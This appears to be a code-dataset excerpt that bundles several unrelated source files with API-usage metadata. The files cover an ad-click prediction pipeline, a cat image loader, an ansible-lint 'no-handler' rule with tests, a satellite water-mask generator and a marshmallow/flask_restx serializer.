"api_name": "nuitka.ModuleRegistry.getDoneModules",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "nuitka.ModuleRegistry.getUncompiledTechnicalModules",
"line_number": 122,
"usage_type": "call"
},
{
"api_name": "nuitka.Options.isShowInclusion",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "nuitka.Options",
"line_number": 147,
"usage_type": "name"
},
{
"api_name": "nuitka.Tracing.inclusion_logger.info",
"line_number": 148,
"usage_type": "call"
},
{
"api_name": "nuitka.Tracing.inclusion_logger",
"line_number": 148,
"usage_type": "name"
},
{
"api_name": "templates.CodeTemplatesLoader.template_metapath_loader_body",
"line_number": 150,
"usage_type": "name"
},
{
"api_name": "Indentation.indented",
"line_number": 151,
"usage_type": "call"
},
{
"api_name": "Indentation.indented",
"line_number": 152,
"usage_type": "call"
},
{
"api_name": "Indentation.indented",
"line_number": 154,
"usage_type": "call"
}
] |
8747012693
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 24 23:16:21 2019
@author: ADMIN
"""
import pandas as pd
import numpy as np
import AllFunctions as af
#import dateutil
import math
item_data=pd.read_csv("item_data.csv")
log_data=pd.read_csv("view_log.csv",parse_dates=['server_time'],infer_datetime_format=True)
train_data=pd.read_csv("train.csv",parse_dates=['impression_time'],infer_datetime_format=True)
test_data=pd.read_csv("test.csv",parse_dates=['impression_time'],infer_datetime_format=True)
test_data['is_click']=-1
train_test_data=pd.concat([train_data,test_data],axis=0)
ismall=item_data.head(5)
#dfDesc=af.getDFDesc(item_data)
item_data=af.categorizeCols(item_data,cols=['item_id','category_1', 'category_2', 'category_3','product_type'])
#dfDesc=af.getDFDesc(item_data)
item_data['item_price_log']=np.log(item_data['item_price'])
#dfDesc=af.getDFDesc(log_data)
log_data=af.categorizeCols(log_data,cols=['session_id','user_id','item_id'])
#dfDesc=af.getDFDesc(log_data)
log_item_data=pd.merge(log_data,item_data,on='item_id')
train_test_data['impression_time_7less'] = train_test_data['impression_time'] - pd.to_timedelta(7, unit='d')
train_test_data.reset_index(inplace=True,drop=True)
"""user_ids_list = np.unique(log_data['user_id'])
minimptime=np.min(train_test_data['impression_time_7less'])
l=log_item_data.sample(frac=0.001,random_state=5)
l.to_csv('lShort.csv',index=False)
t=train_test_data.sample(frac=0.01,random_state=5)
t.to_csv('tShort.csv',index=False)"""
log_item_data.to_csv('log_item_data.csv',index=False)
train_test_data.to_csv('train_test_data.csv',index=False)
def calcAllOutputs(df):
visit_count = len(df)
total_sessions = len(np.unique(df['session_id']))
total_items = len(np.unique(df['item_id']))/visit_count
total_category_1 = len(np.unique(df['category_1']))/visit_count
total_category_2 = len(np.unique(df['category_2']))/visit_count
total_category_3 = len(np.unique(df['category_3']))/visit_count
total_product_type = len(np.unique(df['product_type']))/visit_count
item_price_max = np.max(df['item_price_log'])
item_price_min = np.min(df['item_price_log'])
item_price_avg = np.mean(df['item_price_log'])
item_price_std = np.std(df['item_price_log'])
item_price_rng = item_price_max - item_price_min
max_time=np.max(df['server_time'])
impid=np.max(df['impression_id'])
#diff = df['impression_time'] - max_time
#diff1 = diff.total_seconds()
res=[impid,visit_count,total_sessions ,total_items ,total_category_1 ,total_category_2 ,total_category_3 ,total_product_type ,item_price_max ,item_price_min ,item_price_avg ,item_price_std ,item_price_rng,max_time]
return res
def calcImpFeatures(df):
previous_imp_app_count=len(np.unique(df['app_code']))
max_time2=np.max(df['impression_time_y'])
impid=np.max(df['impression_id'])
return [impid,max_time2,previous_imp_app_count]
def calcAppFeatures(df):
previous_imp_same_app_count=len(np.unique(df['app_code']))
max_time3=np.max(df['impression_time_y'])
impid=np.max(df['impression_id'])
return [impid,max_time3,previous_imp_same_app_count]
def applymathfloor(x):
if np.isnan(x)==False:
return math.floor(x)
else:
return x
dfC=train_test_data.merge(log_item_data,on='user_id')
print(len(dfC))
dfC2 = dfC[(dfC.server_time <= dfC.impression_time) & (dfC.server_time >= dfC.impression_time_7less)]
print(len(dfC2))
dfCHead=dfC2.head(100)
dfC3=dfC2.groupby('impression_id').apply(calcAllOutputs)
dfFeatureset1=pd.DataFrame.from_records(dfC3)
dfFeatureset1.columns=['impression_id','visit_count','total_sessions','total_items','total_category_1','total_category_2','total_category_3','total_product_type','item_price_max','item_price_min','item_price_avg','item_price_std','item_price_rng','max_time']
dfFeatureset1.to_csv('dfFeatureset1.csv',index=False)
dfC=train_test_data.merge(train_test_data[['user_id','impression_time','app_code']],on='user_id',suffixes=('', '_y'))
dfC2=dfC[dfC.impression_time<dfC.impression_time_y]
dfC3=dfC2.groupby('impression_id').apply(calcImpFeatures)
dfFeatureset2=pd.DataFrame.from_records(dfC3)
dfFeatureset2.columns=['impression_id','max_time2','previous_imp_app_count']
dfFeatureset2.to_csv('dfFeatureset2.csv',index=False)
dfC4=dfC2[dfC2.app_code==dfC2.app_code_y]
dfC5=dfC4.groupby('impression_id').apply(calcAppFeatures)
dfFeatureset3=pd.DataFrame.from_records(dfC5)
dfFeatureset3.columns=['impression_id','max_time3','previous_imp_same_app_count']
dfFeatureset3.to_csv('dfFeatureset3.csv',index=False)
"""
train_test_data=pd.read_csv('train_test_data.csv',parse_dates=['impression_time'],infer_datetime_format=True)
dfFeatureset1=pd.read_csv('dfFeatureset1.csv',parse_dates=['max_time'],infer_datetime_format=True)
dfFeatureset2=pd.read_csv('dfFeatureset2.csv',parse_dates=['max_time2'],infer_datetime_format=True)
dfFeatureset3=pd.read_csv('dfFeatureset3.csv',parse_dates=['max_time3'],infer_datetime_format=True)
"""
mergeddf=train_test_data.merge(dfFeatureset1,on='impression_id',how='left')
mergeddf=mergeddf.merge(dfFeatureset2,on='impression_id',how='left')
mergeddf=mergeddf.merge(dfFeatureset3,on='impression_id',how='left')
mergeddf['diff1']=(mergeddf['impression_time']-mergeddf['max_time']).dt.total_seconds()
mergeddf['diff2']=(mergeddf['max_time2']-mergeddf['impression_time']).dt.total_seconds()
mergeddf['diff3']=(mergeddf['max_time3']-mergeddf['impression_time']).dt.total_seconds()
train_test_data=mergeddf
s=train_test_data.app_code.value_counts()
s=s/len(train_test_data)
train_test_data['app_imp']=train_test_data['app_code'].apply(lambda x: s[x])
train_test_data['diff_days']=(train_test_data['diff1']/3600/24).apply(applymathfloor)
#train_test_data['diff_hours']=(train_test_data['diff1']/3600).apply(applymathfloor)
#train_test_data['diff_mins']=(train_test_data['diff1']/60).apply(applymathfloor)
#train_test_data['diff_secs']=(train_test_data['diff1']).apply(applymathfloor)
train_test_data['prev_diff_days']=(train_test_data['diff2']/3600/24).apply(applymathfloor)
#train_test_data['prev_diff_hours']=(train_test_data['diff2']/3600).apply(applymathfloor)
#train_test_data['prev_diff_mins']=(train_test_data['diff2']/60).apply(applymathfloor)
#train_test_data['prev_diff_secs']=(train_test_data['diff2']).apply(applymathfloor)
train_test_data['prev_app_diff_days']=(train_test_data['diff3']/3600/24).apply(applymathfloor)
#train_test_data['prev_app_diff_hours']=(train_test_data['diff3']/3600).apply(applymathfloor)
#train_test_data['prev_app_diff_mins']=(train_test_data['diff3']/60).apply(applymathfloor)
#train_test_data['prev_app_diff_secs']=(train_test_data['diff3']).apply(applymathfloor)
train_test_data['it_day_of_week'] = train_test_data['impression_time'].dt.dayofweek
train_test_data['it_month_start'] = train_test_data['impression_time'].dt.is_month_start
train_test_data['it_month_end'] = train_test_data['impression_time'].dt.is_month_end
train_test_data['it_weekday'] = train_test_data['impression_time'].apply(lambda x: x.weekday())
train_test_data=train_test_data.drop(columns=['impression_id','impression_time','user_id','impression_time_7less','app_code','max_time','max_time2','max_time3'])
train_test_data=train_test_data.drop(columns=['diff1','diff2','diff3'])
train_test_data=train_test_data.fillna(0)
train_test_data=af.categorizeCols(train_test_data,cols=['os_version','it_day_of_week','it_weekday'])
train_test_data=af.LabelEncodeCols(train_test_data.copy(),onehotColumns=[], categorical_columns=['os_version','it_day_of_week','it_weekday'])
train_test_data.to_csv("train_test_dataAll.csv",index=False)
#train_test_data=pd.read_csv('train_test_dataAll.csv')
X=train_test_data
#af.plot_corr(X)
# dropping correlated variables
X=X.drop(columns=['previous_imp_app_count','prev_app_diff_days'])
X=X.drop(columns=['total_category_1','total_category_2','total_category_3','total_sessions', 'item_price_min','item_price_max','item_price_std'])
X=X.drop(columns=['total_product_type','visit_count'])
print(X.columns)
pred_variable_type = "categorical"
target_variable='is_click'
TrainCleanVars={}
X_trainVal=X[X['is_click']!= -1]
X_test=X[X['is_click']== -1]
X_test=X_test.drop(columns=['is_click'])
X_trainVal.reset_index(inplace=True,drop=True)
X_test.reset_index(inplace=True,drop=True)
zeroOneCols=X_trainVal.apply(lambda x: af.ChkZeroOne(x))
standarizeCols=list(zeroOneCols[zeroOneCols==False].index)
X_trainVal,scaler=af.normalize(X_trainVal,standarizeCols)
#standarizeCols.remove(target_variable)
X_test=af.normalize(X_test,standarizeCols,scaler)
trainVal_frame=X_trainVal
x_cols=list(X_trainVal.columns)
y_col=target_variable
trainVal_frame[target_variable] = trainVal_frame[target_variable].astype(np.uint8)
class_weights=af.GetClassWeights(trainVal_frame[target_variable])
trainVal_frame['class_weights'] =[class_weights[x] for x in trainVal_frame[target_variable]]
import H2OHandler as hh
# h2o.cluster().shutdown(prompt=True)
print("Start H2O model training")
#H2o internally uses k-fold cross validation
res,PredDF,predtrain,ptrain=hh.GetBestH2OModel(trainVal_frame,x_cols,y_col,pred_variable_type == "categorical",X_test,weights_column='class_weights',stopping_metric='AUC')
TrainCleanVars['H2OBestModel']=res.leader
X_test[target_variable]=PredDF['predict']
X_test[standarizeCols]=scaler.inverse_transform(X_test[standarizeCols])
ts=af.GetTimeStamp()
af.PickleWrite(TrainCleanVars,"TrainCleanVars"+str(ts)+".pkl")
X_test['impression_id']=test_data['impression_id']
final_sub=X_test[['impression_id',target_variable]]
final_sub.to_csv('samplesubmission'+str(ts)+'.csv',index=False)
lb=res.leaderboard
lbres=lb[:5,"model_id"]
import h2o
m = h2o.get_model(lb[0,"model_id"])
varimpres=m.varimp(use_pandas=True)
lbscores=lb.head(rows=lb.nrows).as_data_frame()
|
kinjaldand/MLProjects
|
AdClickPredictWNSHack/Work2.py
|
Work2.py
|
py
| 9,745 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pandas.read_csv",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "pandas.concat",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "AllFunctions.categorizeCols",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numpy.log",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "AllFunctions.categorizeCols",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "pandas.merge",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "pandas.to_timedelta",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "numpy.min",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "numpy.std",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "numpy.isnan",
"line_number": 94,
"usage_type": "call"
},
{
"api_name": "math.floor",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame.from_records",
"line_number": 108,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 108,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame.from_records",
"line_number": 115,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 115,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame.from_records",
"line_number": 121,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 121,
"usage_type": "attribute"
},
{
"api_name": "AllFunctions.categorizeCols",
"line_number": 171,
"usage_type": "call"
},
{
"api_name": "AllFunctions.LabelEncodeCols",
"line_number": 172,
"usage_type": "call"
},
{
"api_name": "AllFunctions.ChkZeroOne",
"line_number": 196,
"usage_type": "call"
},
{
"api_name": "AllFunctions.normalize",
"line_number": 199,
"usage_type": "call"
},
{
"api_name": "AllFunctions.normalize",
"line_number": 201,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 210,
"usage_type": "attribute"
},
{
"api_name": "AllFunctions.GetClassWeights",
"line_number": 211,
"usage_type": "call"
},
{
"api_name": "H2OHandler.GetBestH2OModel",
"line_number": 218,
"usage_type": "call"
},
{
"api_name": "AllFunctions.GetTimeStamp",
"line_number": 224,
"usage_type": "call"
},
{
"api_name": "AllFunctions.PickleWrite",
"line_number": 225,
"usage_type": "call"
},
{
"api_name": "h2o.get_model",
"line_number": 236,
"usage_type": "call"
}
] |
72833443067
|
# PET DATA PROCESSING
import numpy as np
import matplotlib.pyplot as plt
from pathlib import Path
num_examples = 1386
num_examples2 = 1386
res = 64
def folder_to_array(file_name, cat_name, X, idx1, numf, numt, y, label):
idx_normal = range(idx1, idx1+numf)
idx_flip = range(idx1+numf, idx1+2*numf)
idx_twist = range(idx1+2*numf, idx1+2*numf+numt)
idx_twistflip = range(idx1+2*numf+numt, idx1+2*numf+2*numt)
modes = ['','flip/','twist/','twistflip/']
for m, idx_range in enumerate([idx_normal, idx_flip, idx_twist, idx_twistflip]):
file_no = 0
my_file = Path('')
for i in idx_range:
while my_file.is_file() == False:
file_no += 1
my_file = Path(file_name+modes[m]+cat_name+str(file_no)+'.jpg')
X[i, :, :, :] = plt.imread(file_name+modes[m]+cat_name+str(file_no)+'.jpg', format='jpg')
y[i, :] = label
my_file = Path('')
def gen():
X_data = np.zeros((num_examples, res, res, 3), dtype='uint8')
y_data = np.zeros((num_examples, 2))
X_data2 = np.zeros((num_examples2, res, res, 3), dtype='uint8')
y_data2 = np.zeros((num_examples2, 2))
British_Shorthair = 'Pets/crop64_british_shorthair/'
Siamese = 'Pets/crop64_siamese/'
Persian = 'Pets/crop64_persian/'
Ragdoll = 'Pets/crop64_ragdoll/'
Bengal = 'Pets/crop64_bengal/'
Bombay = 'Pets/crop64_bombay/'
# TASK 1 DATA
folder_to_array(British_Shorthair, 'British_Shorthair_', X_data, 0, 200, 147, y_data, np.array([1., 0.]))
folder_to_array(Siamese, 'Siamese_', X_data, 694, 200, 146, y_data, np.array([0., 1.]))
# TASK 2 DATA
folder_to_array(Siamese, 'Siamese_', X_data2, 0, 200, 146, y_data2, np.array([1., 0.]))
folder_to_array(British_Shorthair, 'British_Shorthair_', X_data2, 692, 200, 147, y_data2, np.array([0., 1.]))
return X_data, y_data, X_data2, y_data2
|
alexgilbert747/thesis
|
pets_data2.py
|
pets_data2.py
|
py
| 1,969 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pathlib.Path",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.imread",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 50,
"usage_type": "call"
}
] |
18920197222
|
from __future__ import annotations
import sys
from typing import TYPE_CHECKING
from ansiblelint.rules import AnsibleLintRule
if TYPE_CHECKING:
from ansiblelint.file_utils import Lintable
from ansiblelint.utils import Task
def _changed_in_when(item: str) -> bool:
if not isinstance(item, str):
return False
item_list = item.split()
if {"and", "or", "not"} & set(item_list):
return False
return any(
changed in item
for changed in [
".changed",
"|changed",
'["changed"]',
"['changed']",
"is changed",
]
)
class UseHandlerRatherThanWhenChangedRule(AnsibleLintRule):
"""Tasks that run when changed should likely be handlers."""
id = "no-handler"
description = (
"If a task has a ``when: result.changed`` setting, it is effectively "
"acting as a handler. You could use ``notify`` and move that task to "
"``handlers``."
)
link = "https://docs.ansible.com/ansible/latest/playbook_guide/playbooks_handlers.html#handlers"
severity = "MEDIUM"
tags = ["idiom"]
version_added = "historic"
def matchtask(
self,
task: Task,
file: Lintable | None = None,
) -> bool | str:
if task["__ansible_action_type__"] != "task" or task.is_handler():
return False
when = task.get("when")
result = False
if isinstance(when, list):
if len(when) <= 1:
result = _changed_in_when(when[0])
elif isinstance(when, str):
result = _changed_in_when(when)
return result
if "pytest" in sys.modules:
import pytest
# pylint: disable=ungrouped-imports
from ansiblelint.rules import RulesCollection
from ansiblelint.runner import Runner
from ansiblelint.testing import run_ansible_lint
@pytest.mark.parametrize(
("test_file", "failures"),
(
pytest.param("examples/playbooks/no_handler_fail.yml", 5, id="fail"),
pytest.param("examples/playbooks/no_handler_pass.yml", 0, id="pass"),
),
)
def test_no_handler(
default_rules_collection: RulesCollection,
test_file: str,
failures: int,
) -> None:
"""Test rule matches."""
results = Runner(test_file, rules=default_rules_collection).run()
assert len(results) == failures
for result in results:
assert result.tag == "no-handler"
def test_role_with_handler() -> None:
"""Test role with handler."""
role_path = "examples/roles/role_with_handler"
results = run_ansible_lint("-v", role_path)
assert "no-handler" not in results.stdout
|
ansible/ansible-lint
|
src/ansiblelint/rules/no_handler.py
|
no_handler.py
|
py
| 2,753 |
python
|
en
|
code
| 3,198 |
github-code
|
6
|
[
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "ansiblelint.rules.AnsibleLintRule",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "ansiblelint.utils.Task",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "ansiblelint.file_utils.Lintable",
"line_number": 49,
"usage_type": "name"
},
{
"api_name": "sys.modules",
"line_number": 65,
"usage_type": "attribute"
},
{
"api_name": "ansiblelint.rules.RulesCollection",
"line_number": 81,
"usage_type": "name"
},
{
"api_name": "ansiblelint.runner.Runner",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "pytest.mark.parametrize",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "pytest.mark",
"line_number": 73,
"usage_type": "attribute"
},
{
"api_name": "pytest.param",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "pytest.param",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "ansiblelint.testing.run_ansible_lint",
"line_number": 95,
"usage_type": "call"
}
] |
6368283311
|
import datacube
import sys
import xarray as xr
import numpy as np
import geopandas as gpd
from datacube.virtual import construct_from_yaml
from datacube.storage.masking import mask_invalid_data
from osgeo import gdal, osr
site = sys.argv[1]
grid = gpd.read_file('/scratch/a.klh5/mangrove_data/shapefiles/{}.shp'.format(site))
bounds = grid.total_bounds
xmin = bounds[0]
xmax = bounds[2]
ymin = bounds[3]
ymax = bounds[1]
crs = int(grid.crs['init'].split(':')[1])
srs = osr.SpatialReference()
srs.ImportFromEPSG(crs)
combined_ls_sref = construct_from_yaml("""
collate:
- product: ls4_arcsi_sref_global_mangroves
measurements: [green, NIR, red]
- product: ls5_arcsi_sref_global_mangroves
measurements: [green, NIR, red]
- product: ls7_arcsi_sref_global_mangroves
measurements: [green, NIR, red]
- product: ls8_arcsi_sref_global_mangroves
measurements: [green, NIR, red]
""")
def getDataset(crs, xmin, xmax, ymin, ymax):
"Fetch all data for the given area."
print("Fetching data...")
fetch_ds = combined_ls_sref.query(dc, x=(xmin, xmax), y=(ymin, ymax), crs='EPSG:{}'.format(crs), time=('2009-01-01', '2011-12-31'))
grouped_ds = combined_ls_sref.group(fetch_ds, resolution=(-30, 30), output_crs='EPSG:{}'.format(crs))
ds = combined_ls_sref.fetch(grouped_ds)
ds = mask_invalid_data(ds)
print("Done.")
return(ds)
def getNDWI(ds):
print("Generating NDWI...")
ds['NDWI'] = (ds.green - ds.NIR) / (ds.green + ds.NIR)
avg = ds.NDWI.mean('time', skipna=True)
print("Producing mask...")
wm = xr.where(avg >= -0.3, 1, 0)
wm = wm.fillna(255)
wm = wm.astype('uint8')
wm = wm.sortby("y", ascending=False)
print("Done.")
return(wm)
def outputToFile(output):
outfile = '{}.kea'.format(site)
# Output to KEA file
x_size = len(output.x.values)
y_size = len(output.y.values)
x_min = np.amin(output.x.values)
y_max = np.amax(output.y.values)
geo_transform = (x_min, 30, 0.0, y_max, 0.0, -30)
driver = gdal.GetDriverByName('KEA')
output_raster = driver.Create(outfile, x_size, y_size, 1, 1) # Only one band, byte data type since there are only 2 values
output_raster.SetProjection(srs.ExportToWkt())
output_raster.SetGeoTransform(geo_transform)
raster_band = output_raster.GetRasterBand(1)
raster_band.SetNoDataValue(255)
raster_band.SetDescription("mask")
raster_band.WriteArray(output.values)
output_raster = None
dc = datacube.Datacube()
ds = getDataset(crs, xmin, xmax, ymin, ymax)
wm = getNDWI(ds)
outputToFile(wm)
|
klh5/wm_generator
|
gen_water_mask.py
|
gen_water_mask.py
|
py
| 2,809 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "sys.argv",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "geopandas.read_file",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "osgeo.osr.SpatialReference",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "osgeo.osr",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "datacube.virtual.construct_from_yaml",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "datacube.storage.masking.mask_invalid_data",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "xarray.where",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "numpy.amin",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "numpy.amax",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "osgeo.gdal.GetDriverByName",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "osgeo.gdal",
"line_number": 89,
"usage_type": "name"
},
{
"api_name": "datacube.Datacube",
"line_number": 103,
"usage_type": "call"
}
] |
28970147437
|
import typing as t
import collections
import flask_restx
import flask_restx.fields as frf
import marshmallow.fields as mf
from marshmallow_pynamodb import ModelSchema
from model.base_model import Model
from common.util import create_table
class Serializer(ModelSchema):
_api_model = None
def __init__(self, *args, **kwargs):
super(Serializer, self).__init__(*args, **kwargs)
create_table(self.model())
@property
def api_model(self):
if self._api_model is None:
self._api_model = self._get_api_model()
return self._api_model
def loads_required(self, json_data: str, many: bool = False):
data = self.loads(json_data=json_data, many=many).attribute_values
if many:
return [self._remove_additional_fields(data_entry) for data_entry in data]
return self._remove_additional_fields(data)
def serialize(self, obj, *, many: bool = False):
return super(Serializer, self)._serialize(obj, many=many)
def _remove_additional_fields(self, data: dict):
""" Remove fields that aren't provided by user in request """
return {k: v for k, v in data.items() if k in self.declared_fields}
def _get_api_model(self):
""" Map marshmallow schema into flask_restx api model """
model_name = self.model().__name__.replace("Model", "")
rest_attributes = collections.OrderedDict()
for key, value in self.declared_fields.items():
rest_attributes[key] = self.map_marshmallow_field_to_api_field(value)
return flask_restx.Model(model_name, rest_attributes)
@classmethod
def model(cls) -> t.Type[Model]:
""" Expose PynamoDB Model """
return cls.Meta.model
@classmethod
def map_marshmallow_field_to_api_field(cls, marshmallow_field: mf.Field):
if isinstance(marshmallow_field, mf.String):
return frf.String()
if isinstance(marshmallow_field, (mf.Raw, mf.Mapping, mf.Dict)):
return frf.Raw()
if isinstance(marshmallow_field, (mf.List, mf.Tuple)):
return frf.List(cls.map_marshmallow_field_to_api_field(marshmallow_field.inner))
if isinstance(marshmallow_field, (mf.Number, mf.Integer, mf.Decimal, mf.Int)):
return frf.Integer()
if isinstance(marshmallow_field, (mf.Boolean, mf.Bool)):
return frf.Boolean()
if isinstance(marshmallow_field, mf.Float):
return frf.Float()
if isinstance(marshmallow_field, mf.Date):
return frf.Date()
if isinstance(marshmallow_field, mf.DateTime):
return frf.DateTime()
if isinstance(marshmallow_field, (mf.Url, mf.URL)):
return frf.Url()
raise Exception(f"Cannot map {marshmallow_field} to API model field")
def serializer_factory(model_class: t.Type[Model]):
class _Serializer(Serializer):
is_removed = mf.Boolean(default=False)
created_at = mf.Float(allow_none=True)
class Meta:
model = model_class
return _Serializer
|
wizzdev-pl/iot-starter
|
web_server/server/core/serializer.py
|
serializer.py
|
py
| 3,081 |
python
|
en
|
code
| 7 |
github-code
|
6
|
[
{
"api_name": "marshmallow_pynamodb.ModelSchema",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "common.util.create_table",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "collections.OrderedDict",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "flask_restx.Model",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "typing.Type",
"line_number": 48,
"usage_type": "attribute"
},
{
"api_name": "model.base_model.Model",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Field",
"line_number": 53,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 53,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.String",
"line_number": 54,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 54,
"usage_type": "name"
},
{
"api_name": "flask_restx.fields.String",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 55,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Raw",
"line_number": 56,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 56,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Mapping",
"line_number": 56,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields.Dict",
"line_number": 56,
"usage_type": "attribute"
},
{
"api_name": "flask_restx.fields.Raw",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 57,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.List",
"line_number": 58,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 58,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Tuple",
"line_number": 58,
"usage_type": "attribute"
},
{
"api_name": "flask_restx.fields.List",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 59,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Number",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 60,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Integer",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields.Decimal",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields.Int",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "flask_restx.fields.Integer",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 61,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Boolean",
"line_number": 62,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 62,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Bool",
"line_number": 62,
"usage_type": "attribute"
},
{
"api_name": "flask_restx.fields.Boolean",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Float",
"line_number": 64,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 64,
"usage_type": "name"
},
{
"api_name": "flask_restx.fields.Float",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 65,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Date",
"line_number": 66,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 66,
"usage_type": "name"
},
{
"api_name": "flask_restx.fields.Date",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 67,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.DateTime",
"line_number": 68,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 68,
"usage_type": "name"
},
{
"api_name": "flask_restx.fields.DateTime",
"line_number": 69,
"usage_type": "call"
},
{
